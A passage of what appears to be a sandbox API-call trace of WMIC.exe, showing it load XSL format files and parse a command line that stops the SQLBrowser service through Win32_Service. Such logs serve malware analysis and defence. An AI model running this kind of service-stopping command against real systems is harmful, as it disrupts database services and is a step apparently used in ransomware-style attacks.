(param_1="texttablewsys.xsl") returned 0x11 [0244.101] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.102] malloc (_Size=0x30) returned 0x458340 [0244.102] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.102] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.102] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.102] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=12, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.102] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.102] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.102] malloc (_Size=0x18) returned 0x45c860 [0244.102] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.102] free (_Block=0x45c860) [0244.102] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0244.102] malloc (_Size=0x18) returned 0x45c860 [0244.102] malloc (_Size=0x18) returned 0x45c880 [0244.102] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.102] SysStringLen (param_1="TABLE") returned 0x5 [0244.102] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.103] SysStringLen (param_1="XML") returned 0x3 [0244.103] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.103] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.103] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.103] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.103] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.103] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.103] malloc (_Size=0x30) returned 0x458380 [0244.103] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.103] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.103] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.103] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=13, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.103] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.103] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.103] malloc (_Size=0x18) returned 0x45c8a0 [0244.103] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.103] free (_Block=0x45c8a0) [0244.103] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0244.103] malloc (_Size=0x18) returned 0x45c8a0 [0244.104] malloc (_Size=0x18) returned 0x45c8c0 [0244.104] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.104] SysStringLen (param_1="TABLE") returned 0x5 [0244.104] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.104] SysStringLen (param_1="XML") returned 0x3 [0244.104] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.104] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.104] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.104] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.104] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.104] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.104] malloc (_Size=0x30) returned 0x4583c0 [0244.104] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.104] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.104] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.104] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=14, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.104] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="texttable.xsl") returned 0x0 [0244.104] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.104] malloc (_Size=0x18) returned 0x45c8e0 [0244.104] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.105] free (_Block=0x45c8e0) [0244.105] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0244.105] malloc (_Size=0x18) returned 0x45c8e0 [0244.105] malloc (_Size=0x18) returned 0x45c900 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] SysStringLen (param_1="TABLE") returned 0x5 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] SysStringLen (param_1="XML") returned 0x3 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.105] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.105] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0244.105] malloc (_Size=0x30) returned 0x458400 [0244.105] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.105] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.105] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.105] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=15, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.105] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="htable.xsl") returned 0x0 [0244.105] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.106] malloc (_Size=0x18) returned 0x45c920 [0244.106] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.106] free (_Block=0x45c920) [0244.106] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0244.106] malloc (_Size=0x18) returned 0x45c920 [0244.106] malloc (_Size=0x18) returned 0x45c940 [0244.106] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.106] SysStringLen (param_1="TABLE") returned 0x5 [0244.106] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.106] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.106] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.106] SysStringLen (param_1="XML") returned 0x3 [0244.106] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.106] SysStringLen (param_1="texttablewsys") returned 0xd [0244.106] SysStringLen (param_1="XML") returned 0x3 [0244.106] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.106] malloc (_Size=0x30) returned 0x458440 [0244.106] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.106] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.106] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.107] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=16, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.107] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="htable.xsl") returned 0x0 [0244.107] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.107] malloc (_Size=0x18) returned 0x45c960 [0244.107] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.107] free (_Block=0x45c960) [0244.107] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0244.107] malloc (_Size=0x18) returned 0x45c960 [0244.107] malloc (_Size=0x18) returned 0x45c980 [0244.107] SysStringLen (param_1="htable-sortby") returned 0xd [0244.107] SysStringLen (param_1="TABLE") returned 0x5 [0244.107] SysStringLen (param_1="htable-sortby") returned 0xd [0244.107] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.107] SysStringLen (param_1="htable-sortby") returned 0xd [0244.107] SysStringLen (param_1="XML") returned 0x3 [0244.107] SysStringLen (param_1="htable-sortby") returned 0xd [0244.107] SysStringLen (param_1="texttablewsys") returned 0xd [0244.107] SysStringLen (param_1="htable-sortby") returned 0xd [0244.108] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0244.108] SysStringLen (param_1="XML") returned 0x3 [0244.108] SysStringLen (param_1="htable-sortby") returned 0xd [0244.108] malloc (_Size=0x30) returned 0x458480 [0244.108] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.108] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.108] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.108] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=17, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.108] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="mof.xsl") returned 0x0 [0244.108] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.108] malloc (_Size=0x18) returned 0x45c9a0 [0244.108] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.108] free (_Block=0x45c9a0) [0244.108] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0244.108] malloc (_Size=0x18) returned 0x45c9a0 [0244.108] malloc (_Size=0x18) returned 0x45c9c0 [0244.108] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.108] SysStringLen (param_1="TABLE") returned 0x5 [0244.109] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.109] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.109] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.109] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.109] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.109] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.109] malloc (_Size=0x30) returned 0x4584c0 [0244.109] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.109] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.109] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.109] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=18, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.109] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="mof.xsl") returned 0x0 [0244.109] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.109] malloc (_Size=0x18) returned 0x45c9e0 [0244.109] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.109] free (_Block=0x45c9e0) [0244.109] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0244.109] malloc (_Size=0x18) returned 0x45c9e0 [0244.110] malloc (_Size=0x18) returned 0x45ca00 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] SysStringLen (param_1="TABLE") returned 0x5 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0244.110] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.110] SysStringLen (param_1="wmiclimofformat") returned 0xf [0244.110] malloc (_Size=0x30) returned 0x458500 [0244.110] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.110] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.110] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.110] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=19, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.110] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="textvaluelist.xsl") returned 0x0 [0244.110] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.110] malloc (_Size=0x18) returned 0x45ca20 [0244.111] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.111] free (_Block=0x45ca20) [0244.111] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0244.111] malloc (_Size=0x18) returned 0x45ca20 [0244.111] malloc (_Size=0x18) returned 0x45ca40 [0244.111] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.111] SysStringLen (param_1="TABLE") returned 0x5 [0244.111] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.111] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.111] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.111] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.111] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.111] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.111] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.111] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.111] malloc (_Size=0x30) returned 0x458540 [0244.111] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.111] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.111] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.111] IXMLDOMNodeList:get_item (in: This=0x1c59cc0, index=20, listItem=0xcfa70 | out: listItem=0xcfa70*=0x1c5bd50) returned 0x0 [0244.111] IXMLDOMNode:get_text (in: This=0x1c5bd50, text=0xcfa80 | out: text=0xcfa80*="textvaluelist.xsl") returned 0x0 [0244.112] IXMLDOMNode:get_attributes (in: This=0x1c5bd50, attributeMap=0xcfa78 | out: attributeMap=0xcfa78*=0x1c578d0) returned 0x0 [0244.112] malloc (_Size=0x18) returned 0x45ca60 [0244.112] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c578d0, name="KEYWORD", namedItem=0xcfa88 | out: namedItem=0xcfa88*=0x1c5a280) returned 0x0 [0244.112] free (_Block=0x45ca60) [0244.112] IXMLDOMNode:get_nodeValue (in: This=0x1c5a280, value=0xcfac0 | out: value=0xcfac0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0244.112] malloc (_Size=0x18) returned 0x45ca60 [0244.112] malloc (_Size=0x18) returned 0x45ca80 [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] SysStringLen (param_1="TABLE") returned 0x5 [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0244.112] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0244.112] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0244.112] malloc (_Size=0x30) returned 0x458580 [0244.113] IUnknown:Release (This=0x1c5bd50) returned 0x0 [0244.113] IUnknown:Release (This=0x1c578d0) returned 0x0 [0244.113] IUnknown:Release (This=0x1c5a280) returned 0x0 [0244.113] IUnknown:Release (This=0x1c59cc0) returned 0x0 [0244.113] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c5bc50) returned 0x1 [0244.114] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c571d0) returned 0x0 [0244.114] free (_Block=0x456f40) [0244.114] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice" [0244.114] malloc (_Size=0xe0) returned 0x456f00 [0244.114] memcpy_s (in: _Destination=0x456f00, _DestinationSize=0xde, _Source=0x1c25ee, _SourceSize=0xd6 | out: _Destination=0x456f00) returned 0x0 [0244.115] malloc (_Size=0x18) returned 0x45caa0 [0244.115] malloc (_Size=0x18) returned 0x45cac0 [0244.115] malloc (_Size=0x18) returned 0x45cae0 [0244.115] malloc (_Size=0x18) returned 0x45cb00 [0244.115] malloc (_Size=0x80) returned 0x45cd30 [0244.115] GetLocalTime (in: lpSystemTime=0xcfc30 | out: lpSystemTime=0xcfc30*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x3, wMilliseconds=0x9)) [0244.115] _vsnwprintf (in: _Buffer=0x45cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcfb88 | out: _Buffer="04-28-2020T20:42:03") returned 19 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] malloc (_Size=0x92) returned 0x45cdc0 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] malloc (_Size=0x92) returned 0x45ce60 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.115] malloc (_Size=0xa) returned 0x45cb20 [0244.115] lstrlenW (lpString="path") returned 4 [0244.115] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0244.115] malloc (_Size=0xa) returned 0x45cb40 [0244.115] malloc (_Size=0x8) returned 0x457150 [0244.115] free (_Block=0x0) [0244.115] free (_Block=0x45cb20) [0244.115] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.116] malloc (_Size=0x1c) returned 0x45cf00 [0244.116] lstrlenW (lpString="Win32_Service") returned 13 [0244.116] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0244.116] malloc (_Size=0x1c) returned 0x45cf30 [0244.116] malloc (_Size=0x10) returned 0x45cb20 [0244.116] memmove_s (in: _Destination=0x45cb20, _DestinationSize=0x8, _Source=0x457150, _SourceSize=0x8 | out: _Destination=0x45cb20) returned 0x0 [0244.116] free (_Block=0x457150) [0244.116] free (_Block=0x0) [0244.116] free (_Block=0x45cf00) [0244.116] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.116] malloc (_Size=0xc) returned 0x45cb60 [0244.116] lstrlenW (lpString="where") returned 5 [0244.116] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0244.116] malloc (_Size=0xc) returned 0x45cb80 [0244.116] malloc (_Size=0x18) returned 0x45cba0 [0244.116] memmove_s (in: _Destination=0x45cba0, _DestinationSize=0x10, _Source=0x45cb20, _SourceSize=0x10 | out: _Destination=0x45cba0) returned 0x0 [0244.116] free (_Block=0x45cb20) [0244.116] free (_Block=0x0) [0244.116] free (_Block=0x45cb60) [0244.116] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.116] malloc (_Size=0x3a) returned 0x45cf60 [0244.116] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0244.116] _wcsicmp (_String1="\"name like '%%SQLBrowser%%'\"", _String2="\"NULL\"") returned -20 [0244.116] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0244.116] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0244.116] malloc (_Size=0x3a) returned 0x45cfb0 [0244.116] malloc (_Size=0x20) returned 0x45cf00 [0244.116] memmove_s (in: _Destination=0x45cf00, _DestinationSize=0x18, _Source=0x45cba0, _SourceSize=0x18 | out: _Destination=0x45cf00) returned 0x0 [0244.117] free (_Block=0x45cba0) [0244.117] free (_Block=0x0) [0244.117] free (_Block=0x45cf60) [0244.117] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.117] malloc (_Size=0xa) returned 0x45cba0 [0244.117] lstrlenW (lpString="call") returned 4 [0244.117] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0244.117] malloc (_Size=0xa) returned 0x45cb60 [0244.117] malloc (_Size=0x30) returned 0x4585c0 [0244.117] memmove_s (in: _Destination=0x4585c0, _DestinationSize=0x20, _Source=0x45cf00, _SourceSize=0x20 | out: _Destination=0x4585c0) returned 0x0 [0244.117] free (_Block=0x45cf00) [0244.117] free (_Block=0x0) [0244.117] free (_Block=0x45cba0) [0244.117] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 72 [0244.117] malloc (_Size=0x18) returned 0x45cba0 [0244.117] lstrlenW (lpString="stopservice") returned 11 [0244.117] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0244.117] malloc (_Size=0x18) returned 0x45cb20 [0244.117] free (_Block=0x0) [0244.117] free (_Block=0x45cba0) [0244.117] malloc (_Size=0x30) returned 0x458600 [0244.117] lstrlenW (lpString="QUIT") returned 4 [0244.117] lstrlenW (lpString="path") returned 4 [0244.117] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0244.117] lstrlenW (lpString="EXIT") returned 4 [0244.117] lstrlenW (lpString="path") returned 4 [0244.117] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0244.117] free (_Block=0x458600) [0244.118] WbemLocator:IUnknown:AddRef (This=0x1e11390) returned 0x2 [0244.118] malloc (_Size=0x30) returned 0x458600 [0244.118] lstrlenW (lpString="/") returned 1 [0244.118] lstrlenW (lpString="path") returned 4 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0244.118] lstrlenW (lpString="-") returned 1 [0244.118] lstrlenW (lpString="path") returned 4 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0244.118] lstrlenW (lpString="CLASS") returned 5 [0244.118] lstrlenW (lpString="path") returned 4 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0244.118] lstrlenW (lpString="PATH") returned 4 [0244.118] lstrlenW (lpString="path") returned 4 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0244.118] lstrlenW (lpString="/") returned 1 [0244.118] lstrlenW (lpString="Win32_Service") returned 13 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0244.118] lstrlenW (lpString="-") returned 1 [0244.118] lstrlenW (lpString="Win32_Service") returned 13 [0244.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0244.118] lstrlenW (lpString="Win32_Service") returned 13 [0244.118] malloc (_Size=0x1c) returned 0x45cf00 [0244.118] lstrlenW (lpString="Win32_Service") returned 13 [0244.118] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0244.119] lstrlenW (lpString="Win32_Service") returned 13 [0244.119] malloc (_Size=0x1c) returned 0x457150 [0244.119] lstrlenW (lpString="Win32_Service") returned 13 [0244.119] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffc76940 | out: _String=0x0, _Context=0xffffffffffc76940) returned 0x0 [0244.119] lstrlenW (lpString="") returned 0 [0244.119] lstrlenW (lpString="WHERE") returned 5 [0244.119] lstrlenW (lpString="where") returned 5 [0244.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0244.119] lstrlenW (lpString="/") returned 1 [0244.119] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0244.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLBrowser%%'", cchCount1=26, lpString2="/", cchCount2=1) returned 3 [0244.119] lstrlenW (lpString="-") returned 1 [0244.119] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0244.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLBrowser%%'", cchCount1=26, lpString2="-", cchCount2=1) returned 3 [0244.119] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0244.119] malloc (_Size=0x36) returned 0x458640 [0244.119] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0244.119] lstrlenW (lpString="/") returned 1 [0244.119] lstrlenW (lpString="call") returned 4 [0244.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0244.119] lstrlenW (lpString="-") returned 1 [0244.119] lstrlenW (lpString="call") returned 4 [0244.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0244.119] lstrlenW (lpString="call") returned 4 [0244.119] malloc (_Size=0xa) returned 0x45cba0 [0244.119] lstrlenW (lpString="call") returned 4 [0244.120] lstrlenW (lpString="GET") returned 3 [0244.120] lstrlenW (lpString="call") returned 4 [0244.120] CompareStringW 